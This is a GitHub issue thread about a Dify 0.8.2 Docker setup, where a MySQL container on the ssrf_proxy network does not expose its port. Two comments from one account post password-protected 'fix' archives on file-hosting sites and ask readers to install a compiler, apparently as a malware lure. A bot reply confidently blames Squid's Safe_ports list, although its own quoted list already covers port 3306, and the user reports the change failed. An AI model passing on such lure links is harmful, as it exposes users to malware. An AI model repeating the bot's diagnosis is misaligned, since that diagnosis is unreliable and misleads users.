I started a mysql container. Network When the ssrf_proxy_network is configured, the set port cannot be exposed

[dingidng]

Self Checks

• [X] This is only for bug report, if you would like to ask a question, please head to Discussions.
• [X] I have searched for existing issues search for existing issues, including closed ones.
• [X] I confirm that I am using English to submit this report (我已阅读并同意 Language Policy).
• [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
• [X] Please do not modify this template :) and fill in all the required fields.

Dify version

0.8.2

Cloud or Self Hosted

Self Hosted (Docker)

Steps to reproduce

1.Modified the container configuration

  docker_ssrf_proxy_network:
    external: true

2. docker run

   docker run --name mysql -d --net docker_ssrf_proxy_network -p 0.0.0.0:8502:3306 -v mysql-data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -e MYSQL_DATABASE=test mysql:latest 

   or

   services:
   mysql:
       command:
           - --mysql-native-password=on
       container_name: ${CONTAINER_NAME}
       environment:
           MYSQL_ROOT_PASSWORD: ${PANEL_DB_ROOT_PASSWORD}
       image: mysql:8.4.2
       labels:
           createdBy: Apps
       networks:
           - docker_ssrf_proxy_network
       ports:
           - "8502:3306"
       restart: always
       volumes:
           - ./data/:/var/lib/mysql
           - ./conf/my.cnf:/etc/my.cnf
           - ./log:/var/log/mysql
           - /etc/timezone:/etc/timezone:ro
           - /etc/localtime:/etc/localtime:ro
   networks:
   docker_ssrf_proxy_network:
       external: true

View containers in a network

docker network inspect docker_ssrf_proxy_network --format '{{json .Containers}}' | jq .

{
  "0dd1b01c374805496dcffb76f3edc91c87979b5ae37dcdcad4cb5b2e1f3a4532": {
    "Name": "docker-worker-1",
    "EndpointID": "188c1484ebf019fc0fe3772733fbe59d86bbc7757601498d900a7304d8333fc8",
    "MacAddress": "02:42:ac:12:00:06",
    "IPv4Address": "172.18.0.6/16",
    "IPv6Address": ""
  },
  "23823cda027664b6862928cbb7b8ac38f8efba47a4659d87013c0faccf0a0a9f": {
    "Name": "docker-api-1",
    "EndpointID": "b5fa9186b9b2911c135897ce7beb1217b3634c22d0cfd6c572ef9adbe634a160",
    "MacAddress": "02:42:ac:12:00:05",
    "IPv4Address": "172.18.0.5/16",
    "IPv6Address": ""
  },
  "2b7d9c9dadd8bb35e9be06517e1c202750f6c7c8ccbd10ed6ea75936f769af9a": {
    "Name": "docker-sandbox-1",
    "EndpointID": "d12d7d2ad4985676e7914f9c295ac5b47a20c408c35c8fc063e96db2780b5f56",
    "MacAddress": "02:42:ac:12:00:04",
    "IPv4Address": "172.18.0.4/16",
    "IPv6Address": ""
  },
  "8d179d4b7f1634e858c11a995108b268a31ad00a9a0f2b9b950939658ac50b92": {
    "Name": "1Panel-mysql-a4ee",
    "EndpointID": "3660f8df23f6ac1151982aaa44a81f007bc8eb0a138b6b376eeb3ed471b99917",
    "MacAddress": "02:42:ac:12:00:07",
    "IPv4Address": "172.18.0.7/16",
    "IPv6Address": ""
  },
  "bdc1e1c3b2c91d3cdf085038de262cdc0e27f8688d26886fcef0712c9dea06e3": {
    "Name": "docker-db-1",
    "EndpointID": "adb62da58faac37f6864e52dd3d08512c665a06bce0a5004b2f5221ec35ccd0d",
    "MacAddress": "02:42:ac:12:00:02",
    "IPv4Address": "172.18.0.2/16",
    "IPv6Address": ""
  },
  "deb1407805e066c6acdf910b25453820ebdfad026a6b2cb7d62bf69e33bbd672": {
    "Name": "docker-ssrf_proxy-1",
    "EndpointID": "8af082f294b24089fa1bf20f4217866e230354f8d1df6152cf6f9ab3cf308658",
    "MacAddress": "02:42:ac:12:00:03",
    "IPv4Address": "172.18.0.3/16",
    "IPv6Address": ""
  }
}

Confirm on a network，but the set port cannot be exposed

• docker ps -a

8d179d4b7f16   mysql:8.4.2                            "docker-entrypoint.s…"   8 hours ago   Up 8 hours                                                                                        1Panel-mysql-a4ee
e5891542c6ec   nginx:latest                           "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp   docker-nginx-1
23823cda0276   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-api-1
0dd1b01c3748   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-worker-1
ebe68e2c7e28   langgenius/dify-web:0.8.2              "/bin/sh ./entrypoin…"   9 hours ago   Up 9 hours             3000/tcp                                                                   docker-web-1
2b7d9c9dadd8   langgenius/dify-sandbox:0.2.7          "/main"                  9 hours ago   Up 9 hours (healthy)                                                                              docker-sandbox-1
bdc1e1c3b2c9   postgres:15-alpine                     "docker-entrypoint.s…"   9 hours ago   Up 9 hours (healthy)   0.0.0.0:9380->5432/tcp, [::]:9380->5432/tcp                                docker-db-1
deb1407805e0   ubuntu/squid:latest                    "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             3128/tcp                                                                   docker-ssrf_proxy-1

✔️ Expected Behavior

For detailed guidance, thank you

❌ Actual Behavior

For detailed guidance, thank you

[SagarChandra07]

I think this will help you. https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Archive password: changeme

you may need to install the c compiler

[SagarChandra07]

This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Archive codepass: changeme If you don't have the c compliator, install it.(gcc or clang)

[dosubot[bot]]

The set port cannot be exposed when the ssrf_proxy_network is configured for a MySQL container because the ssrf_proxy_network configuration in the squid.conf.template restricts access to specific safe ports. The MySQL default port (3306) is not included in the Safe_ports ACL, which only allows ports 80, 21, 443, 70, 210, 1025-65535, 280, 488, 591, and 777.

Here is the relevant part of the squid.conf.template:

acl Safe_ports port 80        # http
acl Safe_ports port 21        # ftp
acl Safe_ports port 443       # https
acl Safe_ports port 70        # gopher
acl Safe_ports port 210       # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280       # http-mgmt
acl Safe_ports port 488       # gss-http
acl Safe_ports port 591       # filemaker
acl Safe_ports port 777       # multiling http

Since port 3306 is not listed, the http_access deny !Safe_ports rule will block access to it:

http_access deny !Safe_ports

To resolve this issue, you need to modify the squid.conf.template to include port 3306 in the Safe_ports ACL. Add the following line to the squid.conf.template:

acl Safe_ports port 3306      # MySQL

This change will allow the MySQL port to be accessed through the ssrf_proxy_network ^[1][2].

To continue talking to Dosu, mention @dosu.

[dingidng]

ssrf_proxy_network为 MySQL 容器配置时，无法暴露设置的端口，因为ssrf_proxy_network中的配置squid.conf.template限制了对特定安全端口的访问。MySQL 默认端口 (3306) 未包含在Safe_portsACL 中，仅允许端口 80、21、443、70、210、1025-65535、280、488、591 和 777。

以下是相关部分squid.conf.template：

acl Safe_ports port 80        # http
acl Safe_ports port 21        # ftp
acl Safe_ports port 443       # https
acl Safe_ports port 70        # gopher
acl Safe_ports port 210       # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280       # http-mgmt
acl Safe_ports port 488       # gss-http
acl Safe_ports port 591       # filemaker
acl Safe_ports port 777       # multiling http

由于未列出端口 3306，因此该http_access deny !Safe_ports规则将阻止对该端口的访问：

http_access deny !Safe_ports

要解决此问题，您需要修改squid.conf.template以将端口 3306 包含在Safe_portsACL 中。将以下行添加到squid.conf.template：

acl Safe_ports port 3306      # MySQL

ssrf_proxy_network 此更改将允许通过[1] [2]访问 MySQL 端口。

要继续与Dosu交谈，请提及@dosu。

After the above modification, the mysql container still cannot expose ports@dosu，

8d179d4b7f16   mysql:8.4.2                            "docker-entrypoint.s…"   8 hours ago   Up 8 hours                                                                                        1Panel-mysql-a4ee
e5891542c6ec   nginx:latest                           "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp   docker-nginx-1
23823cda0276   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-api-1
0dd1b01c3748   langgenius/dify-api:0.8.2              "/bin/bash /entrypoi…"   9 hours ago   Up 9 hours             5001/tcp                                                                   docker-worker-1
ebe68e2c7e28   langgenius/dify-web:0.8.2              "/bin/sh ./entrypoin…"   9 hours ago   Up 9 hours             3000/tcp                                                                   docker-web-1
2b7d9c9dadd8   langgenius/dify-sandbox:0.2.7          "/main"                  9 hours ago   Up 9 hours (healthy)                                                                              docker-sandbox-1
bdc1e1c3b2c9   postgres:15-alpine                     "docker-entrypoint.s…"   9 hours ago   Up 9 hours (healthy)   0.0.0.0:9380->5432/tcp, [::]:9380->5432/tcp                                docker-db-1
deb1407805e0   ubuntu/squid:latest                    "sh -c 'cp /docker-e…"   9 hours ago   Up 9 hours             3128/tcp                                                                   docker-ssrf_proxy-1